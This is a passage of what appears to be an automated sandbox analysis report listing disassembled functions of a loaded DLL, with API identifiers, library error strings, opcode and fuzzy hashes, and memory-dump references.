                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                            • String ID: Aj?Q$Clone() is not implemented yet.
                                            • API String ID: 2192554526-1187517185
                                            • Opcode ID: d3946e8bc323fe34435c81aca8474fa0ac216212d1b9130b5742a0ed13f20dbb
                                            • Instruction ID: 7b070e61661079ea03055e85aa79f8fa3acfa52542e63f39cd60b47126c7a5fd
                                            • Opcode Fuzzy Hash: d3946e8bc323fe34435c81aca8474fa0ac216212d1b9130b5742a0ed13f20dbb
                                            • Instruction Fuzzy Hash: 36318EB1905248AFDB10CF98D881AAEFBF8FB19314F50462EE821A7680D7759904CF91
                                            APIs
                                              • Part of subcall function 6899D820: _memmove.LIBCMT ref: 6899D930
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6897761A
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                            • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                            • API String ID: 39012651-1139078987
                                            • Opcode ID: 5f93c9cd0d0640685bb45834b270489a6bd035bd320d0184b79684f223cb8d3b
                                            • Instruction ID: 45839037e46f8dbafbf30c09a930db2b48310b8f17080b6785686abe146019a5
                                            • Opcode Fuzzy Hash: 5f93c9cd0d0640685bb45834b270489a6bd035bd320d0184b79684f223cb8d3b
                                            • Instruction Fuzzy Hash: BD4172751083C0AED330CB58C845FAFBBE8ABE9314F444A1DF29997281DB7595048BA7
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68975657
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: Aj?Q$InputBuffer$StringStore: missing InputBuffer argument
                                            • API String ID: 3718517217-3749915416
                                            • Opcode ID: 491f34e5b8a9c1b6b9ef305d7cd2f13ac995f28e7686d0d9480c547c28bf725b
                                            • Instruction ID: 1b42e232ede6af6759b834cd51f6ce5fa443ec134f157773d098b86fcb456ea7
                                            • Opcode Fuzzy Hash: 491f34e5b8a9c1b6b9ef305d7cd2f13ac995f28e7686d0d9480c547c28bf725b
                                            • Instruction Fuzzy Hash: F64117B55087809FD320CF19C490A5BFBE4BBE9718F904A1DF5A983390DB75D908CB52
                                            APIs
                                            • _memset.LIBCMT ref: 6894FA1A
                                              • Part of subcall function 6894FC30: UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,513F6A41), ref: 6894FC98
                                              • Part of subcall function 6894FC30: CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,513F6A41), ref: 6894FCAD
                                              • Part of subcall function 6894FC30: CloseHandle.KERNEL32(?,?,?,00000000,513F6A41), ref: 6894FCB7
                                              • Part of subcall function 6894FC30: SetLastError.KERNEL32(00000000,?,?,00000000,513F6A41), ref: 6894FCBA
                                            • std::tr1::_Xweak.LIBCPMT ref: 6894FA5B
                                            • std::tr1::_Xweak.LIBCPMT ref: 6894FA80
                                              • Part of subcall function 6894FDE0: UnmapViewOfFile.KERNEL32(?,?,00000000,6894FA73,?,513F6A41), ref: 6894FE2D
                                              • Part of subcall function 6894FDE0: CloseHandle.KERNEL32(?,?,00000000,6894FA73,?,513F6A41), ref: 6894FE43
                                              • Part of subcall function 6894FDE0: CloseHandle.KERNEL32(00000000,?,00000000,6894FA73,?,513F6A41), ref: 6894FE4E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CloseHandle$FileUnmapViewXweakstd::tr1::_$ErrorLast_memset
                                            • String ID: Aj?Q
                                            • API String ID: 7609987-52356588
                                            • Opcode ID: f31901ce3d2a5d8fe6f6ab3f7000a9bb3a82d78eb7e47606167fbac4aa62d349
                                            • Instruction ID: d55281947f981d9991a6549e33ce41661b8b9bf99cd1a2c70f7fbeca481dc7db
                                            • Opcode Fuzzy Hash: f31901ce3d2a5d8fe6f6ab3f7000a9bb3a82d78eb7e47606167fbac4aa62d349
                                            • Instruction Fuzzy Hash: 7F31B534A4510AAFDF04CF68C854BEDB7B9EF4530CF908248E82597391E7B5E909CB90
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68978356
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argument_mallocstd::_
                                            • String ID: :Aj?Q$Aj?Q$BufferedTransformation: this object can't be reinitialized
                                            • API String ID: 544870984-2853600034
                                            • Opcode ID: 559beedc9dbfb00055e56b7174ee01017edb8412487d4b93dda78cd7ff525d0a
                                            • Instruction ID: dce0c7f0c79568ea51a5868be59f969863a6cf67920c7061d45a7d819975bcea
                                            • Opcode Fuzzy Hash: 559beedc9dbfb00055e56b7174ee01017edb8412487d4b93dda78cd7ff525d0a
                                            • Instruction Fuzzy Hash: A13118B514C380AFD314CF18D885B6BBBE8FB99714F804A2EF4A693680E775D904CB52
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6897BF2D
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: gfff$gfff$vector<T> too long
                                            • API String ID: 1823113695-3369487235
                                            • Opcode ID: f7b4f09393fef097ffa77bb7fe212c1da0143b2f6ec8c28f1950c270003e0f12
                                            • Instruction ID: b499283ddc0fa8eb3662a27ff7abb8755c2f222b112d5a35f0f7d827ab055501
                                            • Opcode Fuzzy Hash: f7b4f09393fef097ffa77bb7fe212c1da0143b2f6ec8c28f1950c270003e0f12
                                            • Instruction Fuzzy Hash: 7A31B4B1A006099FC728CF59D880E6AF7B9FB98714F50862DE9599B780D731F900CB91
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6897C5BF
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: %Aj?Q$Aj?Q$RoundUpToMultipleOf: integer overflow
                                            • API String ID: 3718517217-1920145602
                                            • Opcode ID: 85fbf48b29672bf7503b506a0427204a304f921ffecc9ff5352d5b3a34b144b1
                                            • Instruction ID: c4b8462d48c7dbdea7ac9f14b4ba13a2c6c1e8920e619533efa4f2cc2614fd58
                                            • Opcode Fuzzy Hash: 85fbf48b29672bf7503b506a0427204a304f921ffecc9ff5352d5b3a34b144b1
                                            • Instruction Fuzzy Hash: B531BF7160C7809FC314CF68C890A6EBBE4BBA9714F844A2EF491C7390D736D808CB82
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68974E00
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: Aj?Q$ArraySink: missing OutputBuffer argument$OutputBuffer
                                            • API String ID: 3718517217-3006783727
                                            • Opcode ID: dc9b5e16c980beb754b931a79e63aff51cbb00b681b7d095bd2a16ad6a2de671
                                            • Instruction ID: c15a360bf4381d4b775f6d9d6223cbba162df33aee4c0f2e15da03cff9261846
                                            • Opcode Fuzzy Hash: dc9b5e16c980beb754b931a79e63aff51cbb00b681b7d095bd2a16ad6a2de671
                                            • Instruction Fuzzy Hash: 463105B55487809FC320CF68C481A5ABBE4BB99714F808A1EF4A683350DB75D908CF52
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6897C14E
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: gfff$gfff$vector<T> too long
                                            • API String ID: 1823113695-3369487235
                                            • Opcode ID: b4918deefa52b0de47e7da2445c46490a5d708e226de343764d3d0a71f95c576
                                            • Instruction ID: 67b29a1dfff8af7024d76b4b39b17fc2b209fe45087397b09d521bcc1e69c693
                                            • Opcode Fuzzy Hash: b4918deefa52b0de47e7da2445c46490a5d708e226de343764d3d0a71f95c576
                                            • Instruction Fuzzy Hash: 3901D173F040255F8320993FFD4444AFA97AAD4398359CA3AE608DF348E531D80243C2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw
                                            • String ID:
                                            • API String ID: 2655171816-0
                                            • Opcode ID: 5f2759f21e0920be8b82fdf71603bcc5ee08e4c73722ed67a23b5babafb2cf16
                                            • Instruction ID: 4f7f7c0423594b1dcb454145baaa5cd57c489bbcaf58bb39efa806eb5548d699
                                            • Opcode Fuzzy Hash: 5f2759f21e0920be8b82fdf71603bcc5ee08e4c73722ed67a23b5babafb2cf16
                                            • Instruction Fuzzy Hash: E85181B57047068FD704DFA9C990A2EB7EAAFDC604F90492DF495C7340EB35E9058B92
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 6895D5E4
                                            • __CxxThrowException@8.LIBCMT ref: 6895D5F9
                                            • std::exception::exception.LIBCMT ref: 6895D608
                                            • __CxxThrowException@8.LIBCMT ref: 6895D61D
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: 1be97acd830b590ccccb3a0a9b5b73a9385ea4a8b9a51f39803da88ee56c96b1
                                            • Instruction ID: ab031e4623fdb65a2f155ec31915686b1474ce9c6dcf7cd683a0ca55c28c47c3
                                            • Opcode Fuzzy Hash: 1be97acd830b590ccccb3a0a9b5b73a9385ea4a8b9a51f39803da88ee56c96b1
                                            • Instruction Fuzzy Hash: E1514BB5A01649AFD704CFA8C980A99FBF4FB19304F90826AD419D7740D731E954CFA2
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68966035
                                            • __CxxThrowException@8.LIBCMT ref: 6896604A
                                            • std::exception::exception.LIBCMT ref: 68966059
                                            • __CxxThrowException@8.LIBCMT ref: 6896606E
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: f906e10db2ab1473953c8fe09224d542cd2e618964d2db6fd36ac62b18ce42e7
                                            • Instruction ID: 4deb82a1d2a6c82a747f67bbc100de5e4f9c31e7447e2a9d0a62f671b629a312
                                            • Opcode Fuzzy Hash: f906e10db2ab1473953c8fe09224d542cd2e618964d2db6fd36ac62b18ce42e7
                                            • Instruction Fuzzy Hash: 0C515AB5A00609AFD704CFA8C880A99FBF4FF19314F90826EE529D7B41D771E954CBA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$Init
                                            • String ID:
                                            • API String ID: 3740757921-0
                                            • Opcode ID: d694d501a6644c43c424e46f63ffea139befef1bc91d2bdd569a54c168cf357c
                                            • Instruction ID: e29a9a729db8a81158d715aed5a9e07c579702aa1f7d33b010d6658b0750c8d6
                                            • Opcode Fuzzy Hash: d694d501a6644c43c424e46f63ffea139befef1bc91d2bdd569a54c168cf357c
                                            • Instruction Fuzzy Hash: 464189722083019FD700DF29C940A5AB7E8FF99724F444A6EF9549B350D731E905CBA2
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68965E87
                                            • __CxxThrowException@8.LIBCMT ref: 68965E9C
                                            • std::exception::exception.LIBCMT ref: 68965EAB
                                            • __CxxThrowException@8.LIBCMT ref: 68965EC0
